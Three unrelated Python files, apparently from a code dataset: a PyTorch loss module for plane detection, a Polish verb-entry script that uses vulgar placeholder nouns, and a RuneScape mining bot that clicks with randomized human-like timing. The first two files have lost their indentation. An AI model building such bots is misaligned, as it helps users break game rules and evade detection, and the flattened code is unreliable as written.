def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
if target.numel() == 0:
return [torch.zeros([], device=output.device)]
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
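# Minimal usage sketch for accuracy() with assumed shapes: logits of shape
# [batch, num_classes] and integer class targets of shape [batch]; the values
# returned are top-k precision percentages.
def _example_accuracy():
    logits = torch.randn(8, 5)
    targets = torch.randint(0, 5, (8,))
    top1, = accuracy(logits, targets, topk=(1,))
    return top1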
def get_world_size():
if not is_dist_avail_and_initialized():
return 1
return dist.get_world_size()
def is_dist_avail_and_initialized():
if not dist.is_available():
return False
if not dist.is_initialized():
return False
return True
class SetCriterion(nn.Module):
""" This class computes the loss for DETR.
The process happens in two steps:
1) we compute hungarian assignment between ground truth boxes and the outputs of the model
2) we supervise each pair of matched ground-truth / prediction (supervise class and box)
"""
def __init__(self, num_classes, matcher, weight_dict, eos_coef, losses, k_inv_dot_xy1):
""" Create the criterion.
Parameters:
num_classes: number of object categories, omitting the special no-object category
matcher: module able to compute a matching between targets and proposals
weight_dict: dict containing as key the names of the losses and as values their relative weight.
eos_coef: relative classification weight applied to the no-object category
losses: list of all the losses to be applied. See get_loss for list of available losses.
"""
super().__init__()
self.num_classes = num_classes
self.matcher = matcher
self.weight_dict = weight_dict
self.eos_coef = eos_coef
self.losses = losses
self.k_inv_dot_xy1 = k_inv_dot_xy1 # 3, hw
empty_weight = torch.ones(self.num_classes + 1)
empty_weight[-1] = self.eos_coef
# empty_weight[-2] = 3
self.register_buffer('empty_weight', empty_weight)
def loss_labels(self, outputs, targets, indices, num_planes, log=True):
"""Classification loss (NLL)
targets dicts must contain the key "labels" containing a tensor of dim [nb_target_boxes]
"""
assert 'pred_logits' in outputs
src_logits = outputs['pred_logits']
idx = self._get_src_permutation_idx(indices)
target_classes_o = torch.cat([tgt[:, 0][J].long() for tgt, (_, J) in zip (targets, indices)])
target_classes = torch.full(src_logits.shape[:2], self.num_classes, dtype=torch.int64, device=src_logits.device)
target_classes[idx] = target_classes_o
# print("idx = ", idx)
# print("target_classes.shape = ", target_classes.shape)
# print("target_classes = ", target_classes)
# print("src_logits.shape = ", src_logits.shape)
# print("empty_weight = ", self.empty_weight)
# exit()
##################### 2020.2.28
# loss_ce = F.cross_entropy(src_logits.transpose(1, 2), target_classes, self.empty_weight.cuda(), ignore_index=0)
loss_ce = F.cross_entropy(src_logits.transpose(1, 2), target_classes, self.empty_weight.cuda())
# import pdb
# pdb.set_trace()
losses = {'loss_ce': loss_ce}
if log:
# TODO this should probably be a separate loss, not hacked in this one here
losses['class_error'] = 100 - accuracy(src_logits[idx], target_classes_o)[0]
return losses
@torch.no_grad()
def loss_cardinality(self, outputs, targets, indices, num_planes):
""" Compute the cardinality error, ie the absolute error in the number of predicted non-empty boxes
This is not really a loss, it is intended for logging purposes only. It doesn't propagate gradients
"""
pred_logits = outputs['pred_logits']
device = pred_logits.device
tgt_lengths = torch.as_tensor([tgt.shape[0] for tgt in targets], device=device)
card_pred = (pred_logits.argmax(-1) != pred_logits.shape[-1] - 1).sum(1)
card_err = F.l1_loss(card_pred.float(), tgt_lengths.float())
losses = {'cardinality_error': card_err}
return losses
    def loss_param(self, outputs, targets, indices, num_planes, log=True):
        """Compute the losses on the plane parameters: an L1 regression loss and a
           cosine-similarity loss between predicted and ground-truth parameters
           (the mean normal angle is also logged for monitoring).
        """
assert 'pred_param' in outputs
idx = self._get_src_permutation_idx(indices)
src_param = outputs['pred_param'][idx] # N, 3
target_param = torch.cat([tgt[:, 1:4][i] for tgt, (_, i) in zip(targets, indices)], dim=0)
# l1 loss
loss_param_l1 = torch.mean(torch.sum(torch.abs(target_param - src_param), dim=1))
# cos loss
similarity = torch.nn.functional.cosine_similarity(src_param, target_param, dim=1) # N
loss_param_cos = torch.mean(1-similarity)
angle = torch.mean(torch.acos(torch.clamp(similarity, -1, 1)))
losses = {}
losses['loss_param_l1'] = loss_param_l1
losses['loss_param_cos'] = loss_param_cos
if log:
losses['mean_angle'] = angle * 180.0 / np.pi
return losses
    def loss_center(self, outputs, targets, indices, num_planes, log=True):
        """Compute the plane-center losses: an L2 loss between predicted and
           ground-truth instance centers and, when per-pixel center predictions
           are available in *outputs*, an L2 loss on the pixel center map.
        """
assert 'pred_center' in outputs
idx = self._get_src_permutation_idx(indices)
src_center = outputs['pred_center'][idx] # N, 2
target_center = torch.cat([tgt[:, 4:6][i] for tgt, (_, i) in zip(targets, indices)], dim=0)
# print('src center = \n', src_center.detach().cpu().numpy())
# print('tgt_center = \n', target_center.detach().cpu().numpy())
# exit()
# l1 loss
delta_xy = torch.abs(target_center - src_center) # N, 2
dist = torch.norm(delta_xy, dim=-1) # N
loss_center_l2 = torch.mean(dist)
losses = {}
losses['loss_center_instance'] = loss_center_l2
'''
pixel_center = outputs['pixel_center'] # b, 2, h, w
b, _, h, w = pixel_center.shape
assert b == len(targets)
loss_center_l2_pixel = 0.
for bi in range(b):
indices_bi = indices[bi]
idx_out = indices_bi[0]
idx_tgt = indices_bi[1]
segmentation = outputs['gt_instance_map'][bi] # 21, h, w
cur_pxiel_center = pixel_center[bi] # 2, h, w
loss_bi = 0.
for pi in range(num_planes):
gt_plane_idx = int(idx_tgt[pi])
mask = segmentation[gt_plane_idx, :, :].view(1, h, w)
mask = mask > 0
centers = torch.masked_select(cur_pxiel_center, mask).view(2, -1) # 2, n
gt_center = targets[bi][gt_plane_idx, 4:6].contiguous().view(2, 1)
loss_dist = torch.norm(torch.abs(centers - gt_center), dim=0).mean()
loss_bi += loss_dist
loss_bi = loss_bi / num_planes
loss_center_l2_pixel += loss_bi
loss_center_l2_pixel = loss_center_l2_pixel / bi
losses['loss_center_pixel'] = loss_center_l2_pixel
'''
if 'gt_plane_pixel_centers' in outputs.keys():
gt_plane_pixel_centers = outputs['gt_plane_pixel_centers']
pixel_center = outputs['pixel_center'] # b, 2, h, w
valid_region = outputs['valid_region'] # b, 1, h, w
mask = valid_region > 0
pixel_dist = torch.norm(torch.abs(gt_plane_pixel_centers - pixel_center), dim=1, keepdim=True) #b, 1, h, w
loss_pixel_center = torch.mean(pixel_dist[mask])
losses['loss_center_pixel'] = loss_pixel_center
return losses
def loss_embedding(self, outputs, targets, indices, num_planes_sum, log=True, t_pull=0.5, t_push=1.5):
embedding_pixel = outputs['pixel_embedding'] # b, c, h, w
embedding_instance = outputs['pred_plane_embedding'] # b, num_query, c
b, c, h, w = embedding_pixel.shape
assert b == len(targets)
pull_losses = 0.
push_losses = 0.
losses = 0.
for bi in range(b):
embedding = embedding_pixel[bi, :, :, :].contiguous()
num_planes = targets[bi].shape[0]
device = embedding.device
indices_bi = indices[bi]
idx_out = indices_bi[0]
idx_tgt = indices_bi[1]
assert idx_tgt.max()+1 == num_planes
segmentation = outputs['gt_instance_map'][bi] # 21, h, w
embeddings = []
centers = []
# select embedding with segmentation
for i in range(num_planes):
gt_plane_idx = int(idx_tgt[i])
mask = segmentation[gt_plane_idx, :, :].view(1, h, w)
mask = mask > 0
feature = torch.transpose(torch.masked_select(embedding, mask).view(c, -1),
0, 1)
embeddings.append(feature) # plane_pt_num, c
pred_plane_idx = int(idx_out[i])
center = embedding_instance[bi, pred_plane_idx, :].contiguous().view(1, c)
centers.append(center)
# intra-embedding loss within a plane
pull_loss = torch.Tensor([0.0]).to(device)
for feature, center in zip(embeddings, centers):
# l2 dist
dis = torch.norm(feature - center, 2, dim=1) - t_pull
dis = F.relu(dis)
pull_loss += torch.mean(dis)
# cos dist
# dis_cos = 1 - F.cosine_similarity(feature, center, dim=1) - 0.01519
# dis_cos = F.relu(dis_cos)
# pull_loss += torch.mean(dis_cos)
# print(torch.mean(dis))
# print(torch.mean(dis_cos))
pull_loss /= int(num_planes)
if num_planes == 1:
losses += pull_loss
pull_losses += pull_loss
push_losses += 0.
continue
# inter-plane loss
centers = torch.cat(centers, dim=0) # n, c
A = centers.repeat(1, int(num_planes)).view(-1, c)
B = centers.repeat(int(num_planes), 1)
distance = torch.norm(A - B, 2, dim=1).view(int(num_planes), int(num_planes))
# distance_cos = 1 - F.cosine_similarity(A, B, dim=1).view(int(num_planes), int(num_planes))
# select pair wise distance from distance matrix
eye = torch.eye(int(num_planes)).to(device)
pair_distance = torch.masked_select(distance, eye == 0)
# pair_distance_cos = torch.masked_select(distance_cos, eye == 0)
# import pdb
# pdb.set_trace()
# l2 dist
pair_distance = t_push - pair_distance
pair_distance = F.relu(pair_distance)
push_loss = torch.mean(pair_distance).view(-1)
# cos dist
# pair_distance_cos = 1.0 - pair_distance_cos
# pair_distance_cos = F.relu(pair_distance_cos)
# push_loss += torch.mean(pair_distance_cos).view(-1)
loss = pull_loss + push_loss
losses += loss
pull_losses += pull_loss
push_losses += push_loss
losses_dict = {}
losses_dict['loss_embedding'] = losses / float(b)
if log:
losses_dict['loss_pull'] = pull_losses / float(b)
losses_dict['loss_push'] = push_losses / float(b)
return losses_dict
def loss_Q(self, outputs, targets, indices, num_planes_sum, log=True):
gt_depths = outputs['gt_depth'] # b, 1, h, w
b, _, h, w = gt_depths.shape
assert b == len(targets)
losses = 0.
for bi in range(b):
num_planes = targets[bi].shape[0]
segmentation = outputs['gt_instance_map'][bi] # 21, h, w
device = segmentation.device
depth = gt_depths[bi] # 1, h, w
k_inv_dot_xy1_map = (self.k_inv_dot_xy1).clone().view(3, h, w).to(device)
gt_pts_map = k_inv_dot_xy1_map * depth # 3, h, w
indices_bi = indices[bi]
idx_out = indices_bi[0]
idx_tgt = indices_bi[1]
assert idx_tgt.max() + 1 == num_planes
# select pixel with segmentation
loss_bi = 0.
for i in range(num_planes):
gt_plane_idx = int(idx_tgt[i])
mask = segmentation[gt_plane_idx, :, :].view(1, h, w)
mask = mask > 0
pts = torch.masked_select(gt_pts_map, mask).view(3, -1) # 3, plane_pt_num
pred_plane_idx = int(idx_out[i])
param = outputs['pred_param'][bi][pred_plane_idx].view(1, 3)
# param = targets[bi][gt_plane_idx, 1:].view(1, 3)
#########################################
# param_gt = targets[bi][gt_plane_idx, 1:4].view(1, 3)
# gt_err = torch.mean(torch.abs(torch.matmul(param_gt, pts) - 1)) # 1, plane_pt_num
# print(gt_err)
#########################################
loss = torch.abs(torch.matmul(param, pts) - 1) # 1, plane_pt_num
loss = loss.mean()
loss_bi += loss
loss_bi = loss_bi / float(num_planes)
losses += loss_bi
# exit()
losses_dict = {}
losses_dict['loss_Q'] = losses / float(b)
return losses_dict
def loss_depth(self, outputs, targets, indices, num_planes_sum, log=True):
gt_pixel_depth = outputs['gt_depth']
pred_pixel_depth = outputs['pixel_depth']
mask = (gt_pixel_depth > 1e-4).float()
loss = torch.sum(torch.abs(pred_pixel_depth - gt_pixel_depth) * mask) / torch.clamp(mask.sum(), min=1)
losses = {'loss_depth_pixel': loss}
# import pdb
# pdb.set_trace()
if 'final_depth' in outputs.keys():
if 'final_depth' in outputs.keys():
pred_final_depth = outputs['final_depth']
loss_final_depth = torch.sum(torch.abs(pred_final_depth - gt_pixel_depth) * mask) / torch.clamp(
mask.sum(), min=1)
losses['loss_final_depth'] = loss_final_depth
if 'final_depth_ref' in outputs.keys():
pred_final_depth_ref = outputs['final_depth_ref']
loss_final_depth_ref = torch.sum(torch.abs(pred_final_depth_ref - gt_pixel_depth) * mask) / torch.clamp(
mask.sum(), min=1)
losses['loss_final_depth_ref'] = loss_final_depth_ref
return losses
def loss_prob_pixel(self, outputs, targets, indices, num_planes_sum, log=True):
gamma = 2.
alpha = 0.25
gt_semantic = outputs['gt_semantic'] # b, 1, h, w
pred_pixel_plane_prob = outputs['pixel_plane_prob'] # b, 1, h, w
pred_pixel_plane_prob = torch.sigmoid(pred_pixel_plane_prob) # b, 1, h, w
loss = - alpha * (1 - pred_pixel_plane_prob) ** gamma * gt_semantic * torch.log(pred_pixel_plane_prob) \
- (1 - alpha) * pred_pixel_plane_prob ** gamma * (1 - gt_semantic) * torch.log(1 - pred_pixel_plane_prob)
loss = torch.mean(loss)
losses = {'loss_prob_pixel': loss}
return losses
def _get_src_permutation_idx(self, indices):
# permute predictions following indices
batch_idx = torch.cat([torch.full_like(src, i) for i, (src, _) in enumerate(indices)])
src_idx = torch.cat([src for (src, _) in indices])
return batch_idx, src_idx
def _get_tgt_permutation_idx(self, indices):
# permute targets following indices
batch_idx = torch.cat([torch.full_like(tgt, i) for i, (_, tgt) in enumerate(indices)])
tgt_idx = torch.cat([tgt for (_, tgt) in indices])
return batch_idx, tgt_idx
def get_loss(self, loss, outputs, targets, indices, num_planes, **kwargs):
loss_map = {
'labels': self.loss_labels,
'param': self.loss_param,
'loss_cardinality': self.loss_cardinality,
'embedding': self.loss_embedding,
'Q': self.loss_Q,
'center': self.loss_center,
'depth': self.loss_depth,
'prob_pixel': self.loss_prob_pixel
}
assert loss in loss_map, f'do you really want to compute {loss} loss?'
return loss_map[loss](outputs, targets, indices, num_planes, **kwargs)
def forward(self, outputs, targets):
""" This performs the loss computation.
Parameters:
outputs: dict of tensors, see the output specification of the model for the format
targets: list of dicts, such that len(targets) == batch_size.
                      The expected keys in each dict depend on the losses applied; see each loss' doc
"""
outputs_without_aux = {k: v for k, v in outputs.items() if k != 'aux_outputs'}
# Retrieve the matching between the outputs of the last layer and the targets
indices = self.matcher(outputs_without_aux, targets)
        # Compute the average number of target boxes across all nodes, for normalization purposes
num_planes = sum(tgt.shape[0] for tgt in targets)
num_planes = torch.as_tensor([num_planes], dtype=torch.float, device=next(iter(outputs.values())).device)
if is_dist_avail_and_initialized():
torch.distributed.all_reduce(num_planes)
num_planes = torch.clamp(num_planes / get_world_size(), min=1).item()
# Compute all the requested losses
losses = {}
for loss in self.losses:
# print(loss)
losses.update(self.get_loss(loss, outputs, targets, indices, num_planes))
# print(loss, 'end-', '*'*10)
# In case of auxiliary losses, we repeat this process with the output of each intermediate layer.
losses_aux = []
if 'aux_outputs' in outputs.keys():
for i, aux_outputs in enumerate(outputs['aux_outputs']):
losses_aux_i = {}
# print(aux_outputs.keys())
# continue
# indices = self.matcher(aux_outputs, targets)
for loss in self.losses:
kwargs = {}
# if 'embedding' in loss:
# continue
if 'param' in loss or 'Q' in loss or 'depth' in loss: #or 'embedding' in loss:
continue
# Logging is enabled only for the last layer
kwargs = {'log': False}
l_dict = self.get_loss(loss, aux_outputs, targets, indices, num_planes, **kwargs)
# l_dict = {k + f'_{i}': v for k, v in l_dict.items()}
losses_aux_i.update(l_dict)
losses_aux.append(losses_aux_i)
        return losses, indices, losses_aux
|
the-stack_106_30645 | import json
import _pickle as pickle
import sys
from wordclasses import Verb
from grammarconstants import PAST,PRESENT,FUTURE,MALE,FEMALE,NEUTER,SINGULAR,PLURAL,FIRST,SECOND,THIRD,PERFECT,IMPERFECT
def inputS(s):
    st = input(s)
    if st == 'x':
        sys.exit()
    return st
with open('verbs.pkl','rb+') as f:
obj = pickle.load(f)
verbs=obj['verbs']
transitives=obj['transitives']
intransitives=obj['intransitives']
ditransitives=obj['ditransitive']
linkings=obj['linkings']
auxiliaries=obj['auxiliaries']
f.close()
print("Adding new verb")
print()
# Generate english variations of the verb
engInfinitive=input("english infinitive: ")
engPastTensePerfect=input("english past tense perfect: ")
engPastTenseImperfectSingular=input("english past tense imperfect singular: ")
engPastTenseImperfectPlural=input("english past tense imperfect plural: ")
engPresentTenseSingularFirst= input("english present tense singular first: ")
engPresentTenseSingular=input("english present tense singular third: ")
engPresentTensePlural=input("english present tense plural: ")
engFutureTensePerfect=input("english future tense perfect: ")
engFutureTenseImperfect=input("english future tense imperfect: ")
# Set english variations on the verb
engVerbVariants = Verb.initVerbVariants()
for i in range(3):
for j in range(2):
for k in range(3):
if j == PLURAL or k == SECOND:
engVerbVariants[PAST][i][j][k][IMPERFECT]=engPastTenseImperfectPlural
engVerbVariants[PRESENT][i][j][k][PERFECT]=engPresentTensePlural
engVerbVariants[PRESENT][i][j][k][IMPERFECT]=engPresentTensePlural
else:
engVerbVariants[PAST][i][j][k][IMPERFECT]=engPastTenseImperfectSingular
if k == FIRST:
engVerbVariants[PRESENT][i][j][k][IMPERFECT]=engPresentTenseSingularFirst
else:
engVerbVariants[PRESENT][i][j][k][IMPERFECT]=engPresentTenseSingular
engVerbVariants[PRESENT][i][j][k][PERFECT]=engPresentTenseSingular
engVerbVariants[PAST][i][j][k][PERFECT]=engPastTensePerfect
engVerbVariants[FUTURE][i][j][k][PERFECT]=engFutureTensePerfect
engVerbVariants[FUTURE][i][j][k][IMPERFECT]=engFutureTenseImperfect
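# Minimal lookup sketch for the variant tables built above, using the indices
# imported from grammarconstants; the structure is
# variants[tense][gender][number][person][aspect].
def example_lookup_variant(variants):
    # e.g. the third-person singular masculine past perfect form ("he <verb>ed")
    return variants[PAST][MALE][SINGULAR][THIRD][PERFECT]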
# Get type of verb (which verb groups to add it to)
if input("transitive? (he "+engPresentTenseSingular+" the ball)")=="y":
transitives.append(len(verbs))
else:
pass
if input("intransitive? (he "+engPresentTenseSingular+")")=="y":
intransitives.append(len(verbs))
else:
pass
if input("ditransitive (uses an indirect object)") == "y":
ditransitives.append(len(verbs))
else:
pass
if input("linking? (links the subject to a noun or an adjective)") == "y":
linkings.append(len(verbs))
else:
pass
if input("auxiliary? (be, do, have) comes before another verb to provide extra information") == "y":
auxiliaries.append(len(verbs))
else:
pass
# Init nouns to make interface easier to handle (so user can see which variation of the verb to input)
nouns = Verb.initVerbVariants()
pnouns = Verb.initVerbVariants()
for i in range(3):
for j in range(2):
# Initialise English nouns
nouns[i][MALE][SINGULAR][FIRST][j]="I (male)"
nouns[i][MALE][SINGULAR][SECOND][j]="you (male)"
nouns[i][MALE][SINGULAR][THIRD][j]="the kitten"
nouns[i][MALE][PLURAL][FIRST][j]="we (male)"
nouns[i][MALE][PLURAL][SECOND][j]="you (plural,male)"
nouns[i][MALE][PLURAL][THIRD][j]="the penises"
nouns[i][FEMALE][SINGULAR][FIRST][j]="I (female)"
nouns[i][FEMALE][SINGULAR][SECOND][j]="you (female)"
nouns[i][FEMALE][SINGULAR][THIRD][j]="the book"
nouns[i][FEMALE][PLURAL][FIRST][j]="we (female)"
nouns[i][FEMALE][PLURAL][SECOND][j]="you (plural,female)"
nouns[i][FEMALE][PLURAL][THIRD][j]="the pussies"
nouns[i][NEUTER][SINGULAR][THIRD][j]="the egg"
nouns[i][NEUTER][PLURAL][THIRD][j]="jajka"
# Init Polish nouns
pnouns[i][MALE][SINGULAR][FIRST][j]="ja"
pnouns[i][MALE][SINGULAR][SECOND][j]="ty"
pnouns[i][MALE][SINGULAR][THIRD][j]="kotek"
pnouns[i][MALE][PLURAL][FIRST][j]="my"
pnouns[i][MALE][PLURAL][SECOND][j]="wy"
pnouns[i][MALE][PLURAL][THIRD][j]="penisy"
pnouns[i][FEMALE][SINGULAR][FIRST][j]="ja"
pnouns[i][FEMALE][SINGULAR][SECOND][j]="ty"
pnouns[i][FEMALE][SINGULAR][THIRD][j]="książka"
pnouns[i][FEMALE][PLURAL][FIRST][j]="my"
pnouns[i][FEMALE][PLURAL][SECOND][j]="wy"
pnouns[i][FEMALE][PLURAL][THIRD][j]="cipki"
pnouns[i][NEUTER][SINGULAR][THIRD][j]="jajko"
polishInfinitive = input("polish infinitive: ")
# Collect input from user on polish variation on the verb
verbVariants = Verb.initVerbVariants()
for i in range(3):
for j in range(3):
for k in range(2):
for l in range(3):
for m in range(2):
if i == PRESENT and j == FEMALE:
verbVariants[i][j][k][l][m]=verbVariants[i][MALE][k][l][m]
elif (j == NEUTER and l == FIRST) or (j == NEUTER and l == SECOND):
pass
elif j == NEUTER and k == PLURAL:
verbVariants[i][j][k][l][m]=verbVariants[i][FEMALE][k][l][m]
elif i == PRESENT and m == PERFECT:
verbVariants[i][j][k][l][m]=verbVariants[i][j][k][l][IMPERFECT]
elif i == FUTURE and m == IMPERFECT:
verbVariants[i][j][k][l][m] = verbs[0].variants[i][j][k][l][m]+" "+polishInfinitive
else:
verbVariants[i][j][k][l][m] = input(nouns[i][j][k][l][m]+" "+engVerbVariants[i][j][k][l][m]+": "+pnouns[i][j][k][l][m]+" ")
verbs.append(Verb(engInfinitive,polishInfinitive,verbVariants))
with open('verbs.pkl','wb+') as f:
pickle.dump(obj,f)
f.close()
|
the-stack_106_30647 | import numpy as np
import os
import six.moves.urllib as urllib
import sys
import tarfile
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import zipfile
import cv2
from mss import mss
import pyautogui
import time
import PySimpleGUI as sg
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
from numpy import array
from utils import label_map_util
import random
from utils import visualization_utils as vis_util
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
import six
from six.moves import range
from six.moves import zip
# This is needed since the notebook is stored in the object_detection folder.
sys.path.append("..")
# script repurposed from sentdex's edits and TensorFlow's example script. Pretty messy as not all unnecessary
# parts of the original have been removed
# # Model preparation
# ## Variables
#
# Any model exported using the `export_inference_graph.py` tool can be loaded here simply by changing `PATH_TO_CKPT` to point to a new .pb file.
#
# By default we use an "SSD with Mobilenet" model here. See the [detection model zoo](https://github.com/tensorflow/models/blob/master/object_detection/g3doc/detection_model_zoo.md) for a list of other models that can be run out-of-the-box with varying speeds and accuracies.
# What model to download.
MODEL_NAME = 'output_inference_graph.pb' # change to whatever folder has the new graph
# MODEL_FILE = MODEL_NAME + '.tar.gz' # these lines not needed as we are using our own model
# DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join('training', 'object-detection.pbtxt') # our labels are in training/object-detection.pbtxt
NUM_CLASSES = 2 # two classes at the moment (tin ore and clay ore)
# ## Download Model
# opener = urllib.request.URLopener() # we don't need to download model since we have our own
# opener.retrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_FILE)
# tar_file = tarfile.open(MODEL_FILE)
# for file in tar_file.getmembers():
# file_name = os.path.basename(file.name)
# if 'frozen_inference_graph.pb' in file_name:
# tar_file.extract(file, os.getcwd())
# ## Load a (frozen) Tensorflow model into memory.
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
# ## Loading label map
# Label maps map indices to category names, so that when our convolution network predicts `5`, we know that this corresponds to `airplane`. Here we use internal utility functions, but anything that returns a dictionary mapping integers to appropriate string labels would be fine
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
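# As the note above says, anything that maps integer class ids to label dicts works here;
# a minimal hand-rolled equivalent (sketch only; the real ids/names come from
# training/object-detection.pbtxt) would be:
#   category_index = {1: {'id': 1, 'name': 'tin_ore'},
#                     2: {'id': 2, 'name': 'clay_ore'}}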
def load_image_into_numpy_array(image):
(im_width, im_height) = image.size
return np.array(image.getdata()).reshape(
(im_height, im_width, 3)).astype(np.uint8)
# For the sake of simplicity we will use only 2 images:
# image1.jpg
# image2.jpg
# If you want to test the code with your images, just add path to the images to the TEST_IMAGE_PATHS.
PATH_TO_TEST_IMAGES_DIR = 'testImages'
TEST_IMAGE_PATHS = [os.path.join(PATH_TO_TEST_IMAGES_DIR, 'image{}.jpeg'.format(i)) for i in range(1, 8)] # adjust range for # of images in folder
# Size, in inches, of the output images.
IMAGE_SIZE = (12, 8)
sg.theme('DarkAmber')
layout = [ [sg.Text('Runescape Bot')],
#[sg.Text('Password'), sg.InputText()],
[sg.Checkbox('Tin Ore', default=True, key = "tin_ore")],
[sg.Checkbox('Clay Ore', default=True, key = "clay_ore")],
[sg.Button('Start'), sg.Button('Stop'), sg.Button('Exit')],
[sg.Checkbox('Drop Items', default=True, key = "dropInvent")] ]
window = sg.Window('Runescape AI', layout, keep_on_top=True, location=(10,50), resizable=True, auto_size_text=True, no_titlebar=True)
monSize = pyautogui.size()
mon1width = monSize[0] # 2560
mon1height = monSize[1] # 1080
mon2width = 2560
mon2height = 1080
#screenshot = mss.mss().grab(window)
sct = mss()
mon2 = sct.monitors[1]
bounding_box = {'top': mon2['top'] + 0, 'left': mon2['left'] + 0, 'width': mon2width, 'height': mon2height}
class spot:
def __init__(self, ymin, xmin, ymax, xmax, box_class_name):
self.xmin = xmin * mon1width
self.xmax = xmax * mon1width
self.ymin = ymin * mon1height
self.ymax = ymax * mon1height
self.centerX = ((xmax * mon1width) + (xmin * mon1width)) / 2
self.centerY = ((ymax * mon1height) + (ymin * mon1height)) / 2
self.class_name = box_class_name
currentMillis = time.time() * 1000
prevMillis = currentMillis
timeDelta = random.randint(4,5) * 1000
teleportStartupDelay = 20000
teleportDelta = 20000
runAgent = True
harvestStatus = False
waiting = False
inventoryGuiPos = [2245, 1020]
magicBookGuiPos = [2345, 1020]
homeTeleportGuiPos = [2380, 745]
bankDepositIterator = 0
travelBool = False
bankTravelPath = [[2542, 81], [2517, 47], [2478, 34], [2452, 40], [2463, 35], [2503, 39], [2528, 58],
[2428, 54], [2407, 94], [2463, 37], [2438, 46], [2471, 34], [2470, 36], [2433, 48],
[2416, 70], [2484, 65]]
bankItemsPath = [[1532, 538], [1533, 581], [1354, 825]]
mineTravelPath = [[2443, 169], [2458, 178], [2496, 177], [2512, 172]]
def bankItems(bankPath, bankInteraction, minePath, bankDepositIterator):
print("pong")
if bankDepositIterator <= len(bankTravelPath):
pyautogui.click(bankPath[bankDepositIterator][0], bankPath[bankDepositIterator][1], duration = np.random.uniform(0.2, 0.6))
elif bankDepositIterator <= (len(bankTravelPath) + len(bankInteraction)):
pyautogui.click(bankItemsPath[0][0], bankItemsPath[0][1], duration = np.random.uniform(0.2, 0.6), button = 'right')
pyautogui.click(bankItemsPath[1][0], bankItemsPath[1][1] + 27, duration = np.random.uniform(0.1, 0.3))
        pyautogui.click(bankItemsPath[2][0], bankItemsPath[2][1], duration = np.random.uniform(0.1, 0.3))
elif bankDepositIterator <= (len(bankTravelPath) + len(bankInteraction) + len(mineTravelPath)):
        pyautogui.click(bankPath[bankDepositIterator - len(bankTravelPath) - len(minePath)][0], bankPath[bankDepositIterator - len(bankTravelPath) - len(minePath)][1], duration = np.random.uniform(0.2, 0.6))
def homeTeleport():
pyautogui.moveTo(magicBookGuiPos[0], magicBookGuiPos[1], duration = np.random.uniform(0.2, 0.6))
pyautogui.click()
pyautogui.click(homeTeleportGuiPos[0], homeTeleportGuiPos[1], duration = np.random.uniform(0.2, 0.6), button = 'right')
pyautogui.click(homeTeleportGuiPos[0], homeTeleportGuiPos[1] + 27, duration = np.random.uniform(0.1, 0.3))
pyautogui.click(inventoryGuiPos[0], inventoryGuiPos[1], duration = np.random.uniform(0.1, 0.3))
firstInventoryPos = [2400, 760]
dropButtonDistance = 40
def dropFirstItem():
pyautogui.click(firstInventoryPos[0], firstInventoryPos[1], button = 'right', duration = np.random.uniform(0.1, 0.2))
pyautogui.click(firstInventoryPos[0], firstInventoryPos[1] + dropButtonDistance, duration = np.random.uniform(0.05, 0.1))
estNumHarvested = 0
# Harvest Config:
harvestConfig = {
"tin_ore" : True,
"clay_ore" : True
}
dropInvent = True
with detection_graph.as_default():
with tf.Session(graph=detection_graph) as sess:
while True:
img = pyautogui.screenshot()
frame = np.array(img)
image_np = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
#print(pyautogui.position()) # Cursor Position Finder
currentMillis = time.time() * 1000
currentPos = pyautogui.position()
#### GUI handling ####
event, values = window.read(timeout=0)
if event == sg.WIN_CLOSED or event == 'Exit': # if user closes window or clicks cancel
break
if event == 'Start':
print("starting harvest")
harvestStatus = True
if event == 'Stop':
print("stopping harvest")
harvestStatus = False
if values["dropInvent"] == True:
dropInvent = True
elif values["dropInvent"] == False:
dropInvent = False
if values["clay_ore"] == True:
harvestConfig["clay_ore"] = True
elif values["clay_ore"] == False:
harvestConfig["clay_ore"] = False
if values["tin_ore"] == True:
harvestConfig["tin_ore"] = True
elif values["tin_ore"] == False:
harvestConfig["tin_ore"] = False
window.Refresh()
######################
if estNumHarvested == -1:
runAgent = False
#print("finishing task")
if((currentMillis - prevMillis) >= teleportStartupDelay + teleportDelta):
prevMillis = currentMillis
print("completing teleport")
waiting = False
runAgent = True
estNumHarvested += 1
elif((currentMillis - prevMillis) >= teleportStartupDelay):
if waiting == False:
waiting = True
print("starting teleport")
homeTeleport()
if travelBool:
#print((len(bankTravelPath) + len(bankItemsPath) + len(mineTravelPath)))
if((currentMillis - prevMillis) >= 30000):
prevMillis = currentMillis
print("ping")
if bankDepositIterator <= (len(bankTravelPath) + len(bankItemsPath) + len(mineTravelPath)):
print("travleing path point: ", bankDepositIterator)
bankItems(bankTravelPath, bankItemsPath, mineTravelPath, bankDepositIterator)
bankDepositIterator += 1
else:
print("arrived")
travelBool = False
if runAgent:
#ret, image_np = cap.read()
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(frame, axis=0)
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
scores = detection_graph.get_tensor_by_name('detection_scores:0')
